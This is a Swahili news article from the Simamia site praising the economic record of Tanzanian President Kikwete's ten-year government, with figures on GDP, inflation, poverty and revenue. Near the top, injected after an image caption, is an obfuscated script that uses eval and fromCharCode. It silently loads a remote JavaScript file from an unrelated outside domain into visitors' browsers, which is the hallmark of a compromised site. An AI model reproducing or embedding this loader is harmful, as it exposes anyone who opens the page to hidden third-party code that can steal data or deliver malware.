Recent Comments

Uchumi wa nchi wapaa, mfumuko wadhibitiwa

By Baraka Bitariho Sep 9, 2015
<p>Majengo pacha ya Benki Kuu ya Tanzania</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Majengo pacha ya Benki Kuu ya Tanzania
Majengo pacha ya Benki Kuu ya Tanzania

SERIKALI ya Awamu ya Nne kupitia Chama Cha Mapinduzi iliingia madarakani tarehe 21 Desemba 2005 chini ya Uongozi wa Rais Jakaya Kikwete.

Kutokana na kazi nzuri iliyofanyika ya kuwaletea wananchi maendeleo, mwaka 2010, Watanzania walikipa tena ridhaa Chama Cha Mapinduzi kuongoza Serikali kwa kipindi kingine cha miaka mitano (2010-2015). Katika kipindi chote cha miaka 10, Serikali imefanya kazi kubwa ya kutekeleza Ilani ya Uchaguzi ya Chama Cha Mapinduzi (CCM) ya mwaka 2005 na 2010 kwa kutekeleza miradi ya kipaumbele ambayo ni muhimu kwa ukuaji wa uchumi.

Katika makala haya mwandishi wetu Kaanaeli Kaale anaelezea mafanikio ya miaka 10 ya uongozi wa Rais Kikwete katika kujenga uchumi. Serikali ya Awamu ya Nne imechukua hatua madhubuti kwa azma ya kujenga Taifa linalojitegemea kwa kukuza uchumi na kupunguza umaskini. Moja ya hatua hizo ni kuunda upya Tume ya Mipango, chini ya Ofisi ya Rais, na kuifanya kuwa chombo cha kubuni na kuishauri Serikali kuhusu sera na mikakati ya kiuchumi ya nchi yetu kwa upeo wa muda wa kati na muda mrefu.

Kupitia tume hiyo, Serikali imeitafsiri Dira ya Taifa ya Maendeleo 2025 kwa kuandaa Mpango Elekezi wa Maendeleo wa Miaka 15 kuanzia 2011-2025. Mpango huo unatekelezwa kwa vipindi vya miaka mitano mitano ambapo mpango wa kwanza wa miaka mitano ulianza kutekelezwa mwaka 2011/2012 na unatarajiwa kukamilika mwaka 2015/2016. Ili kuharakisha utekelezaji wa Mpango wa Miaka Mitano na kufikia malengo ya Dira ya Maendeleo ya Taifa 2025, Serikali imeanzisha mfumo wa utekelezaji, ufuatiliaji na tathmini ya mipango na Programu za Maendeleo ya Taifa, BRN.

Mpango huo umeainisha miradi michache ya kipaumbele yenye uwezo wa kutoa matokeo makubwa kwa kipindi kifupi na tayari utekelezaji umeanza katika maeneo sita ambayo ni elimu, maji, uchukuzi, kilimo, nishati na kuongeza mapato ya serikali. Ufuatiliaji wa utekelezaji wa miradi hiyo unafanywa na chombo maalumu kilichoundwa chini ya Ofisi ya Rais, Ikulu kijulikanacho kama President’s Delivery Bureau.

Pia Serikali imeainisha vikwazo vinavyokwamisha uwekezaji wa kasi wa Sekta Binafsi na kuanza kuvitafutia ufumbuzi chini ya BRN! Katika juhudi za kuboresha mazingira ya biashara maeneo sita ya kipaumbele yanatiliwa mkazo. Pato la Taifa Pato la Taifa kwa bei za soko limeendelea kuongezeka mwaka hadi mwaka kutoka Sh milioni 19,112,830 mwaka 2005 na kufikia Sh milioni 79, 442,499 mwaka 2014 ikiwa ni ongezeko la Sh milioni 60,329,669.

Ongezeko hilo limeifanya Tanzania kuwa miongoni mwa nchi ambazo uchumi wake umekua kwa kasi katika kipindi cha miaka 10 iliyopita. Ukuaji wa uchumi katika 10 ya Rais Kikwete madarakani ni wastani wa asilimia 6.4 kwa mwaka, kiwango ambacho kinaridhisha ikizingatiwa kuwa mwaka 2008 ulitokea mtikisiko wa kiuchumi duniani na kuathiri sekta mbalimbali za uchumi.

Shughuli za kiuchumi zilizochangia ukuaji huo ni pamoja na kilimo, mawasiliano, viwanda, ujenzi na huduma. Udhibiti wa mfumko wa bei Serikali ya Awamu ya Nne imechukua hatua kadhaa za kudhibiti mfumko wa bei ambao ulipanda kuanzia mwaka 2010 na kufikia asilimia 19.8 mwaka 2012 kutokana na mtikisiko wa uchumi duniani.

Hatua hizo ni pamoja na kupanua kilimo cha mazao ya chakula kwa kuongeza upatikanaji wa pembejeo za kilimo ikiwemo mbolea, madawa na mbegu bora; kutekeleza mpango wa kulipa madeni ya kampuni za ufuaji umeme na kupandisha kiwango cha riba ya Benki Kuu inayotozwa kwa mikopo inatotolewa kwa taasisi za fedha nchini kutoka asilimia 7.58 hadi asilimia 12.58.

Kwa mujibu wa taarifa za Ofisi ya Takwimu ya Taifa, mfumko wa bei umedhibitiwa na kupungua hadi asilimia 5.6 mwaka 2013 na kuendelea kubakia kwenye tarakimu moja kama ilivyokuwa mwaka 2005 ulipokuwa wastani wa asilimia 4.35. Hadi kufika mwezi Machi, 2015 mfumko wa bei ulifikia asilimia 4.3. Kupungua kwa umasikini Serikali ya Kikwete imefanikiwa kwa kiasi kikubwa kupunguza umasikini. Pato la wastani la Mtanzania limeongezeka kutoka Sh 360,865 mwaka 2005 hadi Sh 1,725,290 mwaka 2014.

Ripoti ya Utafiti wa Mapato na Matumizi katika Kaya uliofanyika mwaka 2012 inaonesha kuwa umaskini wa kipato kwa watu wanaoishi chini ya Sh 1,216 za Kitanzania kwa siku umepungua kutoka wastani wa asilimia 34.4 mwaka 2007 hadi asilimia 28.2 mwaka 2012 sawa na wastani wa asilimia 6.2. Pia umasikini wa chakula ikiwa na maana watu wanaotumia chini ya Sh 858 kwa matumizi ya chakula kwa siku umepungua kwa wastani wa asilimia 2.1 kutoka asilimia 11.8 mwaka 2007 hadi asilimia 9.7 mwaka 2012.

Kupungua wa idadi ya watu wenye lishe duni ni kiashiria kuwa ukuaji wa uchumi unawafikia wananchi wengi na hivyo kupunguza umaskini wa kipato. Mapato ya Serikali Mapato ya Ndani yameongezeka kutoka Sh bilioni 2,124.8 mwaka 2005 hadi Sh bilioni 10,510.56 Juni, 2014 sawa na ongezeko la asilimia 438.6. Ongezeko hilo limechangiwa na jitihada za Serikali kuendelea kuimarisha usimamizi wa ukusanyaji wa mapato ya kodi na yasiyo ya kodi pamoja na kuongezeka kwa shughuli za uchumi.

Mafanikio hayo yametokana na hatua zilizochukuliwa na Serikali kudhibiti ukwepaji wa kodi kwa kuhakikisha kwamba kila anayestahili kulipa kodi analipa ipasavyo. Hatua hizo ni pamoja na kupitia na kuimarisha matumizi ya mashine za utunzaji kumbukumbu za hesabu za biashara, kudhibiti biashara ya mafuta kwa kuweka vinasaba kwenye mafuta na kuongeza kodi kwenye mafuta ya taa ili kuondokana na tatizo la uchakachuaji wa mafuta ambao unasababisha upotevu mkubwa wa mapato ya Serikali. Kuongezeka kwa mapato hayo kumeiwezesha Serikali kuimarisha upatikanaji wa huduma za jamii pamoja na kugharamia miradi mbalimbali ya maendeleo.

Bajeti ya Serikali Katika kipindi cha miaka 10 iliyopita ya uongozi wa Kikwete shughuli za Serikali zimepanuka kwa kiwango kikubwa na hivyo, kuongeza bajeti ya Serikali mwaka hadi mwaka. Bajeti ya Serikali imeongezeka kutoka Sh trilioni 4.18 mwaka 2005/2006 hadi Sh trilioni 19.67 katika mwaka 2014/2015 ikiwa ni ongezeko la Sh trilioni 14.49. Shughuli za Serikali na bajeti zimepanuka katika sekta za kipaumbele za kilimo, elimu, maji, umeme, afya na miundombinu.

Ongezeko la bajeti limesaidia Serikali kufikisha huduma mbalimbali kwa wananchi hususan walioko vijijini kabla ya Rais Kikwete kuingia madarakani hawakuwa na huduma hizo muhimu za kiuchumi na kijamii. Usimamisi wa fedha za serikali Serikali imeendelea kusimamia matumizi ya fedha za Umma kwa kuboresha mifumo ya kusimamia matumizi na kuiwezesha Ofisi ya Mdhibiti na Mkaguzi Mkuu wa Hesabu za Serikali kutekeleza majukumu yake kwa ufanisi ikiwa ni pamoja na kupitisha Sheria ya Ukaguzi wa Umma Na. 11 ya Mwaka 2008.

Hatua nyingine zilizochukuliwa ni pamoja na kuongeza uwazi wa kujadili Taarifa za Mdhibiti na Mkaguzi Mkuu wa Hesabu za Serikali kupitia Bunge na kulipa Bunge uwezo mkubwa wa kushauri na kusimamia matumizi ya fedha za umma. Juhudi hizo zimeendelea kuimarisha nidhamu ya matumizi ya fedha katika Ofisi, Wizara na Taasisi za Umma. Mathalan, Halmashauri zinazopata Hati Safi zimeongezeka kutoka asilimia 53 mwaka 2005 hadi asilimia 80 mwaka 2013.

Aidha, watumishi wanaobainika kufanya ubadhirifu wa fedha za Umma wanachukuliwa hatua ikiwemo kufikishwa katika vyombo vya sheria na kuchukuliwa hatua za kinidhamu. Hali ya akiba za fedha za kigeni hadi mwezi imekuwa ya kuridhisha kutokana na kuongezeka kwa mikopo ya kibiashara kutoka nje na kupungua kwa matumizi ya Serikali nje ya nchi.

Akiba ya fedha za kigeni ilifikia Dola za Marekani milioni 4,388.6 mwishoni mwa Desemba 2014 kiasi ambacho kinatosheleza uagizaji bidhaa na huduma kutoka nje ya nchi kwa zaidi ya miezi 4. Benki Kuu inaendelea kushiriki katika soko la fedha za kigeni kwa lengo la kuweka viwango sahihi vya ukwasi vinavyoendana na shughuli za kiuchumi. Mafanikio haya yanatokana na utendaji uliotukuka wakati wa uongozi wa Rais Kikwete ambaye ameandaa mazingira mazuri ya serikali ijao kuendelea uchumi ili kuimarisha uchumi wa taifa.

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com